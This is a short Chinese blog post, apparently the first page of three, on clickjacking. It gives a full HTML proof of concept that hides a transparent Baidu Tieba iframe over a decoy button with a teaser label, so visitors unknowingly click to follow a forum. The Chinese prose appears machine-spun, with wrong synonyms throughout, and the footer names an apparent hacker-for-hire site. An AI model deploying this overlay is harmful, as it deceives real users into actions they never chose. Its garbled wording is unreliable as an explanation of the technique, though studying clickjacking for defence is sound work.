Web安全之点击绑架（ClickJacking）

点击绑架（ClickJacking）是一种视觉上的诈骗手法。大概有两种方法，一是攻击者运用一个通明的iframe，掩盖在一个网页上，然后诱运用户在该页面上进行操作，此刻用户将在不知情的情况下点击通明的iframe页面；二是攻击者运用一张图片掩盖在网页，遮挡网页原有方位的意义；

iframe掩盖

直接示例阐明

1. 假设咱们在百度有个贴吧，想悄悄让他人重视它。所以咱们预备一个页面：

<!DOCTYPE HTML>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<head>
<title>点击绑架</title>
<style>      html,body,iframe{          display: block;           height: 100%;           width: 100%;           margin: 0;           padding: 0;           border:none;
     }      iframe{           opacity:0;           filter:alpha(opacity=0);           position:absolute;           z-index:2;
     }      button{           position:absolute;           top: 315px;           left: 462px;           z-index: 1;           width: 72px;           height: 26px;
     }
</style>
</head>
     <body>           那些不能说的隐秘           <button>检查概况</button>
          <iframe src="http://tieba.baidu.com/f?kw=%C3%C0%C5%AE"></iframe>
     </body>
</html>

[1] [2] [3] 黑客接单网

发表于 2021-04-15 22:02
阅读 ( 168 )
分类：互联网

Web安全之点击绑架（ClickJacking）

0 条评论

你可能感兴趣的文章

相关问题